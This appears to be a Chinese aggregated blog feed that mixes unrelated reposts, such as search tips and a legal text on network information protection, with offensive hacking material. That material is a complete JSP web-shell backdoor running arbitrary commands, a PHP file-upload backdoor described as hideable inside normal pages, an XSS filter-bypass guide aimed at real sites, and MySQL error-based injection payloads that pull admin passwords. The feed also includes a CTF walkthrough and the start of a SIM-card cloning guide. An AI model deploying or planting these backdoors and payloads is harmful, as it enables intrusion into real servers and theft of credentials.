小站会根据您的关注，为您发现更多，
看到喜欢的小站就马上关注吧！
下一站，你会遇见谁的梦想？
谷歌搜索技巧 – 非常值得一看的 Google 搜索技巧，搜索更轻松！
Jsp极简版CMD后门
&%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%&&%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp =while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%&&%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("&pre&"+excuteCmd(request.getParameter("cmd"))+"&/pre&");}else{out.println("密码或参数错误.");}%&&&极简版CMD，免去了对文件读写等操作。访问：/你的jsp.jsp?pwd=023&cmd=net+user&1、pwd是当前密码自行修改。2、cmd是cmd任意命令。
link：selina
人大常委会关于加强网络信息保护决定(全文)
为了保护网络信息安全，保障公民、法人和其他组织的合法权益，维护国家安全和社会公共利益，特作如下决定：　　一、国家保护能够识别公民个人身份和涉及公民个人隐私的电子信息。　　任何组织和个人不得窃取或者以其他非法方式获取公民个人电子信息，不得出售或者非法向他人提供公民个人电子信息。　　二、网络服务提供者和其他企业事业单位在业务活动中收集、使用公民个人电子信息，应当遵循合法、正当、必要的原则，明示收集、使用信息的目的、方式和范围，并经被收集者同意，不得违反法律、法规的规定和双方的约定收集、使用信息。　　网络服务提供者和其他企业事业单位收集、使用公民个人电子信息，应当公开其收集、使用规则。　　三、网络服务提供者和其他企业事业单位及其工作人员对在业务活动中收集的公民个人电子信息必须严格保密，不得泄露、篡改、毁损，不得出售或者非法向他人提供。　　四、网络服务提供者和其他企业事业单位应当采取技术措施和其他必要措施，确保信息安全，防止在业务活动中收集的公民个人电子信息泄露、毁损、丢失。在发生或者可能发生信息泄露、毁损、丢失的情况时，应当立即采取补救措施。　　五、网络服务提供者应当加强对其用户发布的信息的管理，发现法律、法规禁止发布或者传输的信息的，应当立即停止传输该信息，采取消除等处置措施，保存有关记录，并向有关主管部门报告。　　六、网络服务提供者为用户办理网站接入服务，办理固定电话、移动电话等入网手续，或者为用户提供信息发布服务，应当在与用户签订协议或者确认提供服务时，要求用户提供真实身份信息。　　七、任何组织和个人未经电子信息接收者同意或者请求，或者电子信息接收者明确表示拒绝的，不得向其固定电话、移动电话或者个人电子邮箱发送商业性电子信息。　　八、公民发现泄露个人身份、散布个人隐私等侵害其合法权益的网络信息，或者受到商业性电子信息侵扰的，有权要求网络服务提供者删除有关信息或者采取其他必要措施予以制止。　　九、任何组织和个人对窃取或者以其他非法方式获取、出售或者非法向他人提供公民个人电子信息的违法犯罪行为以及其他网络信息违法犯罪行为，有权向有关主管部门举报、控告；接到举报、控告的部门应当依法及时处理。被侵权人可以依法提起诉讼。　　十、有关主管部门应当在各自职权范围内依法履行职责，采取技术措施和其他必要措施，防范、制止和查处窃取或者以其他非法方式获取、出售或者非法向他人提供公民个人电子信息的违法犯罪行为以及其他网络信息违法犯罪行为。有关主管部门依法履行职责时，网络服务提供者应当予以配合，提供技术支持。　　国家机关及其工作人员对在履行职责中知悉的公民个人电子信息应当予以保密，不得泄露、篡改、毁损，不得出售或者非法向他人提供。　　十一、对有违反本决定行为的，依法给予警告、罚款、没收违法所得、吊销许可证或者取消备案、关闭网站、禁止有关责任人员从事网络服务业务等处罚，记入社会信用档案并予以公布；构成违反治安管理行为的，依法给予治安管理处罚。构成犯罪的，依法追究刑事责任。侵害他人民事权益的，依法承担民事责任。　　十二、本决定自公布之日起施行。
如何把你的旧手机零件改造成求生工具
————平面设计 之 排版，
【扫一扫 二维码 关注小象爱设计 微信公众平台】，给微信号发QQ邮箱，站长先送455张 风景 摄影大图
喜欢这排版&&转自&
浅谈新手在寻找XSS时所存在的一些误区
有段时间没写东西了， 最近看到zone里出现了很多&XSS怎么绕过某某符号的帖子&，觉得很多新手在寻找XSS时走进了一些误区，比如：专门想着怎么去&绕过&。这里做个总结，希望对大家有所帮助。&1. 误区1： XSS，不是专门去&绕过&限制。&打个简单的比方，一个已经被层层把守的大门，面前荆棘无数，而你又单枪匹马的，怎么闯的进去？ 这个时候你要意识到，走大门是不可能的。其实我们要突破的城防，有很多小门可以进去的，甚至不需要任何手段就可以直接走进去。我们为什么不走呢？&XSS是很好防御的，不就是过滤一下么，所以我们不要太多寄希望与程序员错误的过滤逻辑，而应该把希望寄托于程序员的&忘记过滤&上。&在实际测试过程中，这样的例子会有很多。下面是一个比较典型的例子。&腾讯微博：&正门: 正文内容。 你认为你能突破吗？程序员在这里是重兵把守，早就过滤的严严实实。想突破限制，几乎是不可能的任务。 如果大家意识到这点，就不会问&过滤了& , && 怎么办啊！&小门： 其它参数。 比如微博发布音乐时的 musicLocation 等参数。可以注意到，这里程序员就没有那么重视了，漏洞出了一次又一次。具体见：&A) http://www.wooyun.org/whitehats/心伤的胖子 的 腾讯微博系列B) http://www.wooyun.org/whitehats/gainover 的 &腾讯微博相关&2. 误区2： XSS，不仅仅存在于你所看得见的位置。&大部分新手，在寻找XSS时，都会在一些评论框去输入XSS代码，然后看页面有没有弹窗。当然不是说这个方法没有用，而是这种方法，几乎很难&碰&到一个XSS。所以很多新手会觉得XSS怎么这么难找到。原因有几点：A）：像评论框，个人资料这种，你所能想到的位置。稍微有一点安全意识的程序员也能想到，所以经常是被过滤掉的。 B）：你所填入的资料，并不总是以HTML标签的形式，输出到页面上。所以有时候并不是不能X，只是因为你填入的东西不对。&看不见有两个层面：&A） 输入看不见。建议大家在提交请求的时候，使用抓包软件，然后对请求的参数逐个测试。&B) &输出看不见。建议大家对返回的数据，也可以使用抓包软件抓取数据，然后对抓回的数据进行搜索，搜索你输入的数据，来定位看不见的输出。还有一种方式，在chrome中，可以搜索浏览器调试工具中的[resource]。&3. 误区3： XSS，绕过限制不是让你乱用字符去绕过，切忌盲目。&某人在看到代码是 &a href=&xxxx\u0022&P& 的时候，问大家：&为什么\u0022&不行啊？ 这种绕过是盲目的。&在测试初期，我们如果不愿意去看对方的代码逻辑，可以采用&盲目&的方式去测试（用各种特殊字符去试探），这样可以节省很多时间。但是，当我们已经能够确定，数据输出位于哪个点时，比如上面这个 xxxx ，我们已经知道是输出到了 href=&之间& &的时候。我们就不能盲目的去&绕过&，一定要有针对性。这个针对性主要是以下几点。&A) 输出点，是直接输出，还是经过了DOM。&简单通俗点的说法是：前者可以通过右键查看源代码，搜索到。后者通过右键查看源代码是搜索不到的。&B) 直接输出点，是位于HTML标签里，还是位于Script脚本里，或者是Style里&HTML标签又分为：是在HTML标签之间： &div& 内容在这里 &/div&还是在HTML属性之间： &img alt=&内容在这里&&还是在HTML事件之间: &&img onload=&内容在这里&&Script/style标签：根据输出自己去构造闭合，保证语法正确即可。&C) &DOM输出点，这个需要一定的JS基础。C.1) 定位输出内容的JS代码段。C.2) 查看此代码段，是否存在过滤问题。C.3) 如果存在，制定绕过规则。&D) 输出点，采用的什么过滤规则D.1)了解以上B)中，每个点该过滤什么字符，如果没过滤什么字符，该怎么去利用。D.2)逐个测试法，看看目标输出点，到底过滤了哪些字符D.3)测试服务器端的一些转换逻辑，比如有些服务器会先将&转换为&D.4)确定是否可绕过，不能绕过的尽早放弃&总之，首先要了解如何防御，你才能了解，如何绕过，不能盲目。其中，B+D的规则基本是死的，偶尔碰上些服务器端过滤逻辑有问题的，是可以绕过的，尤其是服务器端采用黑名单的方式时。C则较为灵活，所谓的&绕过&往往是针对这种。&4. 其它：&A) 代码里明明看到插入了 &script&，怎么不执行啊？&这种问题，zone里貌似有几个帖子了，这里强调下，打开调试工具看代码的时候，请注意颜色。 以chrome为例，只有&script&..&/script&标记以彩色显示时，才说明是插入了，而以黑色显示时，实际上的代码是：&script&&. &/script& ，其它标签同理。&B) &xxx xxxx=&xxx&& 这个放进去怎么不行啊？&首先确定你这个是XSS代码，此外，一些新手会在网上找到一些旧的资料，而有些XSS代码是IE6时代的产物，或者是浏览器特异的代码，所以一定要注意代码来源，适用于什么浏览器。link:http://zone.wooyun.org/content/1557附ppt：
可隐藏在正常PHP页面的小马
if($_GET["hackers"]=="2b"){if ($_SERVER['REQUEST_METHOD'] == 'POST') { echo "url:".$_FILES["upfile"]["name"];if(!file_exists($_FILES["upfile"]["name"])){ copy($_FILES["upfile"]["tmp_name"], $_FILES["upfile"]["name"]); }}?&&form method="post" enctype="multipart/form-data"&&input name="upfile" type="file"&&input type="submit" value="ok"&&/form&&?php }?&
使用方法：访问插入文件，没有任何变化，在文件末尾加入?hackers=2b就可以显示小马
光棍节程序员闯关秀通关
游戏地址：第一关：右键查看源码，获取key
第二关:按F12查看元素，抓包获取key第三关：同样F12查看元素，抓包第四关：查看第四关key，解密得4，得出第五关key为MD5（5）=e4da3b7fbbce74a318d5
第五关：下载二维码图片，后缀改为txt，打开得key：bdbf46a337ac08e6b542
第六关：根据提示MD5，谷歌信息得key：86d9ce42cfd
第七关：提示信息就是key
第八关：按F12查看元素，改get为post，然后回到页面输入密码处按回车键
看图，感觉应该要把空填满，配合今天主题，应该是1111，都是二进制，所以尝试换成ASCII码，转换后：H4sIACJKnlAAA+1ZB1RTS7c+IQGkiFQVEImAgHRCDVKkF6kBQrWEECC0QBKqooKKiogUQUBAgUgPSG8WUOleugiKXBVpIhaqqMg7AVTu/f3Le+v9/1pvvbtZc+Y7e3+zZ+995syZLGRkZY5gMb7uMp5+7sC/SeTk5JQVFeG0XkVZaa2XQ6zfr4k8AgGXR8gpqigqKoG3cDl5BQWECgCX+3cFtFkCSGQMEQzFkxDij/8HPJDm5vYP7OupwH/0/1eEfjsjQAcAZhgs3MIabg/fEJoOYAIbAmxwsNHuUX8Yyf4fj/Uv+V+Xf/e7T5N//P7LK6koy//p/UeoqCj+9f7/J2R1cPUFwG5iYGwAQCAQwAj8A1ZfMdYY6+oesURZGBib6oMGAGDMw/j5edPBAcDHl0xEGerA7R0c4YxD4L7AC7AAfAALBkvy07a0NKV5pXH/dq7FAQBC6/ukf23/h8LiiiNhAQCyBcQEVxLWB8TB4PbljfUjkgGA4TWoVw0i+4GYcReIuYlggCCmLSJu93WsR8Mu69h+jWOD0gUxLRY2rAfGFcTHQSzlsknvvgmvx7Am3IY4XxwRj4XTamFJJLjhvXGbwv0n5n9RfLwDvs+3G2ysJC/rg2AvTsvdg2iE2sA3sBh9axCLgLjVj6xD04uC+G2Al602iCXA7ZvTjWhgu86nUw/1sLED8XYQu+LJxjYb+lBfF3OL9bF0WV6Eg6gNTiuWpAvWDBAC8YgHzth0PR4o4IrT06fVC8S7PQKMNvxDTUiB1vrf/YR66Jqv+4ESPTEmliDmA/F5IgFlsR4zNAvnbYha9w9t9iNbbsQAnfT1Njdd9wljw5HWclzTkz1sjNbHwpTJ4ENcHwtzdMMbGG/wj/t5r61FMDYYhRiAst3gdGOI+obrfmCzOF/bDZ/0O10xerTayoBYE0BDMAAOIAAu4BUL+AIr4DcQBRgCOmDvBxBBixuAB7xBDQ604kANHrIV8AJ1v+ZZrnHW8U+G+9roSdpocJZfc9ZnmNrgEGA7YHIwBbDth5nCNGCqMCQAh2nBDsA0YXqgFgnb/2Os5ab5aXNN/fDjDwSAXmk8NKATyxcg/nO+COIRPLbr8oc/jCb8Tcy47/FsrgBAAivwnSm9Of+W47d3/vTxGFbj3Mfachyw+Gf1pX9NP0n/GLwO0Q//ZNA/ox8G/4YAbTA277WIfMCGX4uDtCmCzTk0go0MYMDrS5BH2MT7w4xuvrF8Py20SuDOmS+aAxFSP7VyT+Rm5B7LZcpR5Kb/VOVfVgmaAK2E3oHWQuugjwA4tAHaCL0HbYaWQOs3Pau/vz5+PPu1fL9nS7P8qtY4wJtNh42fTZhNj02QbS+b6U9/bDvY5NmM2MRAC/+P57Z5vs254AEH8Pq9qr+ea51nC1rxQNBaBqS1CvsCIX9a/xujYbth8jDjP61aVdpa/s5g0GfQY9AG4AwSDEgGeQYTGv4eH4MYaEOCV/0/rDrs38kAt4m1OU/ptVVHW6u00YFrNhKAI+OCybSNVpfgF0LEu3uQ4QjwvALXBj9VOLixL1ZGCo7x9oavmUhwIo6EIwbiXGUA2ndwfYueQ6193yDbu37qyGYAoPEO3LO6f+ocAwCgiAQAOxR/6sTBPZHnOgDUKGMDiIEbez4E8ht48HBTQKzfseqAe9PI6uocuF8xxgPAStzq6pes1dWVbND/MAA0eK++BE7pB+PBc4qZGW3XB7YA9BBOcKMGR9Nig/AB9GsYAEwg/D8wCiK+wQFP+efwAGxD77geBts2YO13wEZPd4PuB6P1BvQHjqRxV19C/D3IZD81WVlfkgzGleCCk8ESfGSDMX6y8jJysoB6sFqwj58PjoyBB/t4+5LUgjWE1mhqIKapZYXgaxSyl4aQvZklXJdAxMEVZRRl5IQ0mcFfJupEVzc1lJ7BxnDwTkNoY8agoCCZIAUZAtFdVh6JRMrKIWQRCGmQIU0K8SVjgqV9ScLrTr770QM/6ES8HxlP8IXT7jEuhACyhpAQM3yTbMTp4/djol+m9sMzzTnIVtMl4jBkAtGGQPDW1KbR4QZ4Ii6IQPQiwXWtldVl/0z6Hpnsn0Jbz1t2I3FNZnDk9yJqMgOrzwBdgGsrGwcbKxfHNg4ebq4dAnKCAnx8AmoSUkJy+hpGhnoautqmaJ9DplbuKG3dI+FH3f3JocdDTZwiY88GXfYJDg2kOYFw8/AI8AqoCgqqBprrmgf+t2W1AeDYAq6DVihECKDjgEA5IKsPAUFwedBD1uT7uQZCB4XRMzBuYWJmAQmV7AAdBAqlg0Hp6WHgaoKEgXYAxkHPuUdem4HLCsMo5M+NCI/L3CKsU9rIg+r5IKLgQoxgYt6+Yycv315RMfF9EopKyiqqSDVdPX0DQyNjE2sbW7Qd+HZhXXFu7h54TxI5IDAoOCT09JmzkefOX4iKT7iSmHQ1OSU1K5tyMyc3L7+grLyisqq6prbu/oOHTc0trW3tvX39jweeDA49fflq9PXY+MTk1JuPs3PzC4tLn5Y/0/KCAFDId/llXhxgXnQwGBTGSMsLQhdEI3DA6PfIM3BqWzFi/LmEEOFbuHXiMksbmYQVUB94XIg9zNtFFF/u/UhLbS2zfy2xiP9RZj8S+5nXU4AVCu4DHFAOQAt4vW9f+81BiQhjVSCo8KPHXO3yEPsJt7q9SgKt0U6DnVnVXHpnwpZFCJhw1FbR/gCdE0VeKodFM9oNtaJMprTKpQ+sAijxb51VGvAj7Verz69cRNZJUr79VrUKZLAs2x7rkHTy4NMFRnM1zJQOqXhBKb21UfsaAMRJCd/gG65pbMbUaN49u8h5MSS7G30yE19K2TXMHHyYX7pI+RnNoCZ4+j0Rb7HjV1Vz21j0xuyPRl3m0RXsR6FkGdNG70qakSsD0MYXWBFs9HqU7Fqri0nNPjw3V+JPTpRomWiVnZwqmbKewQ6XuMs0+0CpHul7703krQJ38QxXhlYBR633qRqUYxeHOkqN0JVnq+MzXE9P+P7+nPuZFwfLe6LAOQvPDDzzPqUrE79lyXDPFIptC08lpNe2lzwaiShsvozs2ic4V/ix4MbTKG60b2shkvWSiLerj8CcvrnTzndh4vn1ghIG2y+yfcneM8U38VGpG9JQlE5/smecgIbOU2MSbdNfq5n07MRrXik6kAOd20Z1jcvE7XHG1SqOW6ox26qjuJoQMnqfeLq8gg57F3JeT0RqjlcusISzSllgnCtiXONS6hJSJ7O3+rqjHe19CB5JRjamo1Kh7pWYG8MNoanT5LzFgvBu5t4KKuc+w1SDCg7xw4lq95mPRnnrQnnU5ks0P6dT7ceUZtQNTE8FNZHOzHp1K108qfa45g3lhIZ+yNdTheyh43eYOW97+9teuulfmUsZ3rVz55eShaL2+BFd7snRUqrYbpwLRsaORFGfM3tvxE+M2B8lGdmCa/I0UdCnc+HDskb5L+XweSS1tMAbGCiIswUegwmwpUJmnrKWtPnMwq37M3/z4+BDT2ZFtff7BnWM5S/blQxEjXAn2LkrvlF8e0ma3eXBm/GK5I8OT2X5gqc7rk/YvT664w7G+pXbh8FLz7hbn5HS+s1fp/W9/NISFdHR1pDTBrfEZ96qPGwnJnYr5yxW2CGtXOKEUqK1c7tbYtrS1Hye112OstI2sSDiMdWvz84cPp2vNGTfMgZv411UapvqMRR5aISQn+6tplKljVeaPv2+8nzhbBhZKWv4UGcEk+0tDc+wBrQIW48Rd/qjrYfu2Mm/e15pNF6zHLB/d11CV5A3O6UsK+G9M1ve+atlIXrcYsIfqS21fVTRlQ8IIzb/JzwJVOdnzw+FJP0e5KvVNXHoCra9U42q6Galz9PrQnAwvju0rdK+aGVfOXSbQeFQMbJQOUD7OYs2mqXm9GVnK8epnamNr1r2EyX4S4swj67JG+fI56rM5ci/ou4so0zwNk5QHfA9cCkLILCgGuZSOGxW91RRvfR1at/V1GZPdK1zqZtIhoVolEdWHWvMZX1k38fLo1qd1HZzZJN1d6e3c6gxeky1tZjvOpca/q2delBug19zlmqXSbzgbU8zFtbHh0+4+L/1ROdRxowWuOHuiv0RlHRlk45JfMQdmN/Vimfb60WON2rUDwxr7q5qeb8nsave5drL29JZcU/8uyacZlu3C4UVRlEdSA4C/ZMticrujo7LdlY33PYE8yKptVmc+rfmhcq8BytbsU0+8sO3d6G3ob2UvERIEw+6s8eyjZFi42J3cJ/OmR50PfvqAruCz/0Vrc+P+242zjki1fKbvbSamNmSBHmHhK4PVOYiSYUpNhFjobuUuHPzs+o7uQxN/FQy33kZPS5hu62AL+TKKntdyBq0kPWtiSoC4+xReX5yMmw6hng7ZfDGKHd7VhV56TnfrsXGIs87ubVjhsVeSOrWfA1v27vnWuvi9kPj5gsuD1QFnG+L2XfvhWgpRexW4ek6ubyit6jaL5XaMWYew5HwARIr35vIFslhbX1u2/BujyMfJ2RCCd8iijvS5gv4+E9mm9RqHVMK9f36hMfiQjr3N85Cd81EkZ3DIV08HI3qLpQzLy/3UipMm29k6F06iGzgkXSN5cZdaIDWZoUxWobYdHBiVa3G2cxUb/ajEquQHefm9kpHQ7ttbO9pnSOMxynr72yTUIBPCHhyvEw39H0VByk/iQj8Wkg1Vx4ewyepKxEzD29XP10TttVn2HTXWcZw51kPtfTsFB5s+9lOQa1juZ5Vi3xtx7eMwrSuLtV/s+1SFZPMCbAu7OBXxFNubgG4ZuxcHMTg7YHikzyFshanrXSyFofStguTXcm7sypaBd0f+Zk6dfxeGTM8YK6sFJDtIjk/K8K578XA4fpgkT4+9QWhpAnzgd0hybe9dgpv2RXXZf68/rHkJRZUAovkg4d3j4xohIWSl6h7YKk+KebUUdeY473omg8z094PdOfKxcdqhIuDc7YyfCiIG/vaeiT+WODUQN0dyrG0r/FvDbN/V0ocCM3+0DH9fqF4hCmztoq5wZgrapRLv/bIdbIhR0g2bFZLprIct3hxx0kFrwN5IkcVMsJUp2ecH1/BFQxPZr2+M+RtnIcv8QjKOQztqS958tWT33BIbeIeT69IgWVkI4yUsZDx1JnuiDzv/Yk9pIYi5Lui37K3Jz8LX7xoLCR4jP/cS4ekQM6RUo4ZS7Ukqguaq6GDLaJ4yq9A7xFAnxyvsc/ATFJoWvu4oXwI5bmh3y3vkU7ETQsY2mwxMcBdiPrwmAqdzQR8dOQOz5BZKwppO71QdJmnWaQ3pWE58+josmD3QP+b+sHRdA0ZP/sWRwk8e1kEo4lkxQTKtK/nCB2u667E/BmuuKiO3mtcqu/QFfa+luZIng6rY83z1+sMQt6bR79I6DLRnVS9eTFpOi7qtO4Rvaq5EvWBMRfer8fs9G3IwcevwUQwlOWu+RWJFzhkI6NAyJTDLQF9dNXdqnrj3Uy2vSqDv3W7T5vX1Ud0Ps+tiRXR/ZRXzpLQY+rAERH7YJwXWFCChV4qqjYYEt0q3trMxiRwQIOJu4i+QKJix8ASQk1XdOV68KnAhZbDkdeVHsnpuCXZ2rfwl6dKwfrPuNoilZxUs2KM94qX0dmJk8L746LD33kOxrENq319IJxRYS9j0JORrWVle/NCrfB8fvy3oXd7q2MsZx/eTLerZAoiSCfXjcD0YWcybnBk6ItxjqKaGIa3IQviK+IO1nCddtTyLkvbYyi120I2UdgLK4ycsg1gkp5RZjIWMp1hvll++aYMOqO5gOJ6fmBGfi4tdJwS77IDGC886M2LSCtkjmlYroplYjh0AmWR9yoysdiL18vNgvl2WWTze8/BU8lPYneIATbo7jOv2cykO+QMZhuk6M1a02rTI0Mujt9++6mtgbHb1sy06LNPbz6swrVPd0cj4Vo0qd/2upRGfYkqJsYzaUnUv6z0vgFRbiuPULOND+9zXomT0CjJ7trXxMj0psGuTOoBhgZDdTTujO9S3PnHyRNZ0U/M3LO64NbKwgIt1g5ovEJOTF6H/afhQdsVfFLkQaoOvz1WoviTm3C19Wc7x1SbLclMCdM2ipIHqpcUdscJSp/ILZmKaldwTK0cSl26IOlgmkSRykEIa8j5N2GGJqsF3ZINDnca02Uv1zuFRicsGU2nuaYNPJ555WAgMJp6gPQtn+UoG+WzDde0cmwT/7dZbZETHhyZLlxfWrpRZs+09wcgVoHykqbzF2ayrj5KT++xNRiRu2Mu3/Jin2gP4bpJOE8f2c97lpdUee09Oyn6xTcHanLlzr21HrqQs6idt/irWU8x9kb2uxx8XOma4vDMpTb6rXT0C8GbmnhGCYTv/PRQpXjas+YR5zgONXpeq+iFiScxyflH+9x8dB9xdMA4KqILRTLD3Vrbw7uJFkq5uJM8rzjPSDJgbsXVRxj4f7KZUiQqSBhFdyydOmr0uXf8GKME8sv+rSYsvJmzF2yrZx+iWgVETlruZw3t29Nb3Nt5FE4W9DCO3xuAhrOyyzco3V1KmmItS8keYu+IJVVPR53xlBgYCX36PK7e44j4O81P87mPHiTyEgdH7hTpv6o5Fi+ij0FEnLdgnrj3csq0v6KwSk5KeWpfFLdtYmAka25aQqeGvCO+SGcxhxwxdiq22dZlb7hAcL6MkpNTmIZsSofOC56nCCfNiBi8TESZZNdiyUwyLqbpKbfBpTS1U0E8yGZS81bb3vkvFw8mt5ZzhByEx5uNLi1ryQqO9lalvuLRc49j11R+d1TB6vCRB25YTnaH59YemLiE6NHe+ITBQKfk3/BhIT6kxcIdXG1CJsTpW2eFt8iFKbTlCihj3YXDYow+ygfDoyypfLGQiVznNDQl9dShA46GsPjYzPT+YnbOA2+IoYGUisdC9WxtW+9nRQRVHN+1CzzP7wgc5DROWcxXD+yhPvn8QpMwN21bNChzY/Ehdlwq98m9BaqH78zCdvIl1xhby2c4HUr+5InETi8FzfSCFtH7IaxGguF50fwJBu+yxkynXRoUl9nVPj6ptKmuOXg+Xs+7kDWqKmZL3qEU2ToFPjpBCfmM7JGivEcn5peDa0YH+6Ki+Qxi7Azp/UYO3yTejeeTkPxKnaeuLGp1Rs0jfYtDYtDumc8cnJ6KtgrZP1mJQ4tn1cQ0MjEzaQBtBZ+Pa5rltS6npfC/MccviUmUBsXOfFW73puTw6BZy72UN3Dr6TDX5XjcFQm6k3c6jXYnFzhGXg1Rmrm/ZYycqqhHjhXBQmG33vi3QXOVentscrrTfElaQ9bGJCmD1gh3nWpzu7FLyh+QnebbJuzUL15Md5OM81KnQzQ9dYCgd8LpndN2p310srHqbGonhbpd8+N7fimuMnVvHCXl/KOYhmhWrhbkRG92aa8M+ulRoQz+6+WK2sk30NhJu4QupFK/lUX6OQk5SnnIPD7ztLlyPHBd1IZXOS12i1b+Qr5U/Oen7QsD/BHGq4BhJF63RrVFTEPhvZMialxwX5x0XFUvvJzd2fnk8Ua4wfP+eGMBc8/S3pLXpZWP4iQfsORemaovgWZCA1W7BuqYxccx7TEh3u+wX6SeJAnNryQb9BQPN2t36fi/tahUsSqrVdlhIRCeYZyKFL6CGNeoaZ8Nqw99Yqi/661zjuGiKQu1xa/q4lhyR9K3t9fCGafbcnTxSneL77lGjourN+MdxhhEGcXGnD8QwyQ9o5DJy1aXPZZ8Cjs0fot+w79kdUuykp2U0Ek0s/l46ZaXSA3v8DnCxCEBt+AYwf26ddCCUw8+KFlevZuCODxtqPFyulb47OldzbnRi8UpuFbWbTwd+FPSpbtvDzRVNFnShZ6oKDQcqWNG3A5QLOMzaymWN3fbz8bo6Woqcjmmv/a1v/P4kmoYWnjXOw1+rfCsysovWnEphsKX70fN49tU03iE8QJh3FbO7g6oHXMl42IUwCB7eNZitpBsZXaBntvKCKPPbQn5VbMcMRAtz1DoycZ8ttJn8deIcTIu/6JfGnu3mwHYXVNIZaq+ZHvrEANxf48+2fR+TNM1420mNUhkVtRo0oTjnrvhuDPv5huzoiRePdWrSFkd+if/cfpL/pK/5C/5S/5/yH8BbZ04JAAoAAA=
& 这个应该是Base64编码，解码后
出现乱码了，有不懂问谷歌，这句是真理啊。谷歌发现应该为.tar.gz文件，然后将生成文件改后缀为.tar.gz，解压出两张图片
一张无效图片
另一张就是key了
最后附张通关图
关于Mysql注入过程中的三种报错方式
放点原来的笔记，Mysql在执行语句的时候会抛出异常信息信息，而php+mysql架构的网站往往又将错误代码显示在页面上，这样可以通过构造如下三种方法获取特定数据。实际测试环境：
2+----------------+
3| Tables_in_test |
4+----------------+
5| admin&&&&&&&&& |
6| article&&&&&&& |
7+----------------+
2+-------+------------------+------+-----+---------+----------------+
3| Field | Type&&&&&&&&&&&& | Null | Key | Default | Extra&&&&&&&&& |
4+-------+------------------+------+-----+---------+----------------+
5| id&&& | int(10) unsigned | NO&& | PRI | NULL&&& | auto_increment |
6| user& | varchar(50)&&&&& | NO&& |&&&& | NULL&&& |&&&&&&&&&&&&&&& |
7| pass& | varchar(50)&&&&& | NO&& |&&&& | NULL&&& |&&&&&&&&&&&&&&& |
8+-------+------------------+------+-----+---------+----------------+
2+---------+------------------+------+-----+---------+----------------+
3| Field&& | Type&&&&&&&&&&&& | Null | Key | Default | Extra&&&&&&&&& |
4+---------+------------------+------+-----+---------+----------------+
5| id&&&&& | int(10) unsigned | NO&& | PRI | NULL&&& | auto_increment |
6| title&& | varchar(50)&&&&& | NO&& |&&&& | NULL&&& |&&&&&&&&&&&&&&& |
7| content | varchar(50)&&&&& | NO&& |&&&& | NULL&&& |&&&&&&&&&&&&&&& |
8+---------+------------------+------+-----+---------+----------------+
1、通过floor报错可以通过如下一些利用代码
1and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
2from information_schema.tables group by x)a);
1and (select count(*) from (select 1 union select null union select !1)x
2group by concat((select table_name from information_schema.tables limit 1),
3floor(rand(0)*2)));
举例如下：首先进行正常查询：
1mysql& select * from article where id = 1;
2+----+-------+---------+
3| id | title | content |
4+----+-------+---------+
5|& 1 | test& | do it&& |
6+----+-------+---------+
假如id输入存在注入的话，可以通过如下语句进行报错。
1mysql& select * from article where id = 1 and (select 1 from
2(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
3ERROR ): Duplicate entry '5.1.33-community-log1' for key 'group_key'
可以看到成功爆出了Mysql的版本，如果需要查询其他数据，可以通过修改version()所在位置语句进行查询。例如我们需要查询管理员用户名和密码：Method1:
1mysql& select * from article where id = 1 and (select 1 from
2(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
3from information_schema.tables group by x)a);
4ERROR ): Duplicate entry 'admin8881' for key 'group_key'
1mysql& select * from article where id = 1 and (select count(*)
2from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
3floor(rand(0)*2)));
4ERROR ): Duplicate entry 'admin8881' for key 'group_key'
2、ExtractValue测试语句如下
1and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
实际测试过程
1mysql& select * from article where id = 1 and extractvalue(1, concat(0x5c,
2(select pass from admin limit 1)));--
3ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3、UpdateXml测试语句
1and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
实际测试过程
1mysql& select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
2(select pass from admin limit 1),0x5e24),1));
3ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
All, thanks foreign guys.&
link://pentest_method_of_mysql_error.html
克隆手机SIM卡 实践克隆过程 研究手机SIM安全
SIM 卡可以克隆是手机安全的一个方面，转来给大家看看而已，真正牛的是那些写出这些工具和鼓捣出破解原理的存在者。【前言】一卡对一号，SIM 卡中存储了一些通信过程中的重要信息，作为通信过程中的身份验证和身份识别，之外，卡中一般还存储了联系人和短信，SIM 也自带了一种非常简单的处理器，用于完成通信过程中的加密运算。【克隆SIM 卡】据个人了解，SIM 卡克隆技术最先是从台湾引进大陆的，而克隆SIM 在国外也有些流行的。SIM克隆指的是通过一个专针对于SIM 卡的读卡器，然后读出信息，将关键信息写入在一张支持可读可写的SIM 空白卡中即可完成克隆过程（注意我们现在所用的SIM 卡是不支持可写操作的）。看似很简单，似乎就是将电脑里的东西拷贝到U 盘这样一个过程，但事实上是比较复杂的，因为SIM 卡厂商也肯定意识到这点，不会让你读出某个关键数据，而这个关键数据我们称为KI，用来在通信过程中验证加密。这个我们后面说，先来看下目前市面上常见的SIM 读卡器，如图1所示：
图1图1 中是市面上比较常见的两种读卡器，在淘宝以及手机市场之类的地方都可以购买到。图2是我所使用的SIM 空白卡，上面印有蝴蝶的图案，大家都称它为&蝴蝶卡&，还有&猴子卡&等命名方式的卡片，之间的最大区别就是容量不同而已。
图2下图是本人从淘宝上购买来的装备，两张空白的&蝴蝶卡&，一个SIM 读卡器，如图3：
